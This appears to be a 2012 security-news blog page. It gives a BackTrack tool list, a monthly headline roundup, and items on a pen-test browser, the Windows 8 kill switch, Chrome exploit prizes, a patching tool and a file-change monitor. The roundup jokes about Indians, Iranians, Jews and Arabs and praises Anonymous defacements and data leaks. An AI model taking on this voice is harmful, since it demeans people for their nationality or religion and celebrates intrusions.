  • se-toolkit
  • sqlsus
  • sslyze
  • sucrack
  • thc-ssl-dos
  • tlssled
  • uniscan
  • vega
  • watobo
  • wcex
  • wol-e
  • xspy
Along with this, the BackTrack team added wiki pages on building a Pyrit cluster, creating a John the Ripper cluster, enabling PAE in BT5 R2 and installing VMware Player.

    Download Backtrack 5 R2

#THN Monthly (February) News Archive, in case you missed something!

# Censorship - Global Concern, THN Magazine March Edition : http://goo.gl/bktRz

# Forget terrorists attacks here are 2012's Most Vulnerable Cities At Risk for Cyber Crime (Idiots) : http://goo.gl/4VYGf

# Slum Dog India demands Real time monitoring on Indian Gmail & Yahoo Emails. Do they really have nothing better to do? http://goo.gl/iYO5H

# Iran will probably drop nuclear development cause they think they need to Develop their own security Software, No more foreign Solution, they might suggest banning the Burka too! : http://goo.gl/QVheH

# Three Greek Anonymous hackers arrested for defacing Government Sites. They couldn't make the street protest! : http://goo.gl/EyMux

# Facebook Hacking - Student jailed for eight months. They ought to jail Facebook for having such a stupid site : http://goo.gl/PwkHt

# FAQ : DNSChanger Trojan, Impact and Solutions : http://goo.gl/IE2Qh

# How Hackers can Track your Mobile phone with a cheap setup ? http://goo.gl/YxyKK

# Anonymous does the work of angels and defaces National Consumer and Federal Trade Commission sites against #ACTA : http://goo.gl/H4Bc8

# Tor Bridge Relay to Bypass Internet Censorship : http://goo.gl/PqVG8

# Dangerous IE browser vulnerabilities, Allows remote code execution ! http://goo.gl/31n5N

# Anonymous Hackers take stock and target Nasdaq website http://goo.gl/XeNUz

# Anonymous shows a cyber army is better than any other and leaks 400 Mb Documents from US Army Intelligence Knowledge Network http://goo.gl/KL2L3

# Microsoft Store India got hacked in India ! : http://goo.gl/87HUp

# "NASA Own3d Again" - NASA Database Leaked by r00tw0rm http://goo.gl/skmUQ

# Cia.gov Tango Down - #FuckFBIFriday by Anonymous. Anonymous reports it was one of the best fucks they ever had! : http://goo.gl/dF7av

# Because Iran is sooooo very democratic they Shutdown Google ,Yahoo & other Major sites using Https Protocol : http://goo.gl/H1Ntv

# Apple Supplier Foxconn’s Servers Hacked, Exposing Vendor Usernames and Passwords : http://goo.gl/fbkba

# Arab Countries websites urged to Increase Security Against Israeli Hackers and stop importing Challah bread : http://goo.gl/ZozkE

# Cryptographers : Satellite phones vulnerable to eavesdropping http://goo.gl/2aB0S

# Anonymous Hack Syrian President's Emails with Password "12345" they knew that cause he can't count higher than that : http://goo.gl/WBNFV

# YamaTough Hacker Demanded $50,000 for not releasing Stolen Symantec Source Code. Other Anons likely to hack him if he doesn't share http://goo.gl/9XqD1

# Citigroup sites hit by Brazilian Anonymous hacker #OpWeeksPayment http://goo.gl/1NO32

# Anonymous Hacks FBI and Records Conference Call. Confirms FBI stands for Fools Bastards & Idiots : http://goo.gl/ZGw4A

# NASA and Pentagon Hacker - TinKode Arrested in Romania http://goo.gl/Kw00L

# FBI will Monitor Social Media using Crawl Application. Since they can't crawl out of a paper bag we won't get too worried : http://goo.gl/hiff8

# CBS Broadcasting Hacked by Anonymous Hackers for #OpMegaUpload http://goo.gl/wyb6m

# Brazil Under Anonymous Attack - Tangara da Serra city site defaced ! I guess they are mad we named a body waxing after them http://goo.gl/QNoGj

# Woohooo! After #SopaBlackout, Congress Postpones Action on #SOPA, #PIPA : http://goo.gl/Oz4nR

# Tit for Tat - Anonymous Hackers Brings Down FBI website for #OpMegaupload. Apparently Anonymous loves a good you know what : http://goo.gl/nbhpT

# SOPA in US and Censorship in India: A cocktail to destroy Internet Freedom ! Idiots! : http://goo.gl/OQQiC

# Cyber War : Another 7000 Israel credit cards Exposed on Internet. Apparently the hackers wanted to see where the good Hanukkah shopping was : http://goo.gl/xHuX5

# Saudi hackers target Israeli stock exchange and National air carrier, mad because they didn't get a Hanukkah present : http://goo.gl/6Ayz7

Sandcat Browser 2.0 Released, Penetration Testing Oriented Browser


Sandcat Browser version 2.0 includes several user interface and experience improvements, an improved extension system, RudraScript support and new extensions.
What is Sandcat Browser?
Its tagline: the fastest web browser combined with the fastest scripting language, packed with features for pen-testers. Sandcat Browser is a freeware, portable, pen-test oriented, multi-tabbed web browser with extension support, developed by the Syhunt team, the creators of the Sandcat web application security scanner. It is built on top of Chromium, the engine behind Google Chrome, and uses the Lua language for extensions and scripting.

The Sandcat Browser includes the following pen-test oriented features:
  • Live HTTP Headers
  • Request Editor extension
  • Fuzzer extension with multiple modes and support for filters
  • JavaScript Executor extension -- allows you to load and run external JavaScript files
  • Lua Executor extension -- allows you to load and run external Lua scripts
  • Syhunt Gelo
  • HTTP Brute Force, CGI Scanner scripts and more.
User Interface & Experience Enhancements
  • New windows will now open in new Tabs.
  • Navigation bar now behaves like Firefox's or Opera's.
  • Improved multi-tab support.
  • Improved source tab.
  • Added a simple cookie logging extension.
Sandcat Browser Extension Development Kit
The Sandcat Browser Extension Development Kit is now available here. It also includes the source of all the Sandcat Browser extensions.
Added RudraScript
Syhunt RudraScript allows you to easily execute code in JavaScript, PascalScript, Perl, PHP, Python, Ruby and VBScript from within the browser and the browser extensions. Details about the RudraScript support can be found at this link.


The Killswitch : They can remotely modify your Window 8


Last year, a Finnish software developer was cruising Google’s Android Market for smartphone apps when he noticed something strange: dozens of best-selling applications suddenly listed the same wrong publisher. Google used a little-known kill switch to forcibly remove the malicious code from more than 250,000 infected Android smartphones. It’s a powerful way to stop threats that spread quickly, but it’s also a privacy and security land mine.

With the rollout of the Windows 8 operating system expected later this year, millions of desktop and laptop PCs will get kill switches for the first time. Microsoft has confirmed that a remote kill switch is built into Windows 8 apps; using this access, it can disable and even remove an app entirely from a user’s device. This information was released along with other details of the upcoming Windows Store for Windows 8.
Anyone worried about Microsoft having complete access to their computer can rest easy for now. The company has stated that it can only “kill” programs downloaded from its new Microsoft App Store. In the company’s own official terms: “In cases where your security is at risk, or where we’re required to do so for legal reasons, you may not be able to run apps or access content that you previously acquired or purchased a license for.”

Any software loaded from a flash drive, DVD, or directly from the Web will remain outside Microsoft’s control. Still, the kill switch is a tool that could help Microsoft prevent mass malware infections. “For most users, the ability to remotely remove apps is a good thing,” says Charlie Miller, a researcher with the security company Accuvant.

Hiroshi Lockheimer, Google’s vice president of Android engineering, says the search company reserves the use of the kill switch for “really egregious, really obvious cases” of harmful content. Microsoft’s Biggs says the company has used the functionality in its smartphones only for “technical issues and content issues.” Apple declined to comment. Amazon did not respond to several messages.

Nonetheless, a “kill switch” is common among curators of online application marketplaces, as companies try to protect users of the platforms they develop from malware or hacking attempts carried out through applications. Microsoft’s upcoming Windows 8 operating system is expected to be launched by the middle of next year.

$60000 for Exploiting Google Chrome, Hackers at Pwnium work...

Google has offered prizes totalling $1 million to those who successfully hack the Google Chrome browser at the Pwn2Own hacker contest taking place next week, i.e. 7 March 2012. Chrome is the only browser in the contest's six-year history never to have been exploited.

Google will therefore hand out prizes of $60,000, $40,000 and $20,000 to contestants able to remotely commandeer a fully patched browser running on Windows 7. A "Full Chrome Exploit", obtaining user-account persistence using only bugs in the browser itself, nets the $60k prize. Exploits that rely on WebKit, Flash or a driver can only earn the lesser amounts.
Prizes will be awarded on a first-come, first-served basis until the entire $1 million has been claimed. “While we’re proud of Chrome’s leading track record in past competitions, the fact is that not receiving exploits means that it’s harder to learn and improve,” said Chris Evans and Justin Schuh, members of the Google Chrome security team.

“To maximize our chances of receiving exploits this year, we’ve upped the ante. We will directly sponsor up to $1 million worth of rewards.” Pwn2Own isn’t the only time researchers can be paid for digging up security flaws in Chrome. Like other companies, including Mozilla and Facebook, Google offers “bug bounties” to researchers, and its flaw-buying program has given out more than $300,000 in payments over the last two years.


Secunia PSI 3.0 : Automatic Patching Of Insecure Applications


Secunia Personal Software Inspector (PSI) is a free program that scans the system for programs installed in an outdated version. The developers have just released the first beta version of Secunia PSI 3.0 for Windows. The new version of the tool from vulnerability-management firm Secunia automates the updating of third-party programs that don’t already have auto-updaters built in.
When you start the program for the first time after installation, you are asked to run a scan of the system. Secunia compares the list of installed software with the latest versions stored in its database, and a list of outdated programs is then displayed in the program interface.

Most software vendors release patches, but it is tedious for users to find and download these updates. The Secunia inspector identifies vulnerable programs and plug-ins on your computer, then downloads and installs all the required patches to keep your computer safe, so that you can bank, shop and socialize online safely.

Secunia PSI 3.0 is compatible with all recent 32-bit and 64-bit editions of the Microsoft Windows operating system.

Download Secunia PSI 3.0 Beta

Irongeek's Shared hosting MD5 Change Detection Script



Adrian Crenshaw, aka Irongeek, has just released another great tool for web admins that monitors the files on a website and reports any changes via email. Irongeek.com, which is hosted on shared hosting, was itself hacked a few days back, and he posted an excellent article about it on his blog, "How I Got Pwned: Lessons in Ghetto Incident Response". After that, Adrian apparently decided to make a handy tool/script to help web admins easily monitor their files on a shared server.
This is a simple shell script that a user can run on a shared server. Suppose hackers get into your website, either by exploiting known vulnerabilities in one of the installed programs or by obtaining FTP access to your server: the first thing they usually do is plant backdoor scripts that let them log in again at a later date. They need some executable script on the server to gain access to MySQL passwords or installation passwords, or to edit settings in your WordPress or other installations. We have also seen situations where the site was left largely unchanged except for malicious JavaScript code added to the bottom of the index.php or index.html files.

The problem is that we do not even know our site has been hacked until it is too late or too embarrassing. Irongeek wrote a script that runs on the server and detects changes to any executable file, or any new file, from HTML and JS to PHP, ASP, Perl and Python files. It generates a hash of every file and compares the hashes periodically, so we can detect when our codebase on the server has changed.

A cron job can be set up to run on the web server, compare the results with the last known valid hashes and send out an email alert. Another tool in a similar spirit, "Artillery", was released by Dave Kennedy to confuse hackers and protect Linux systems.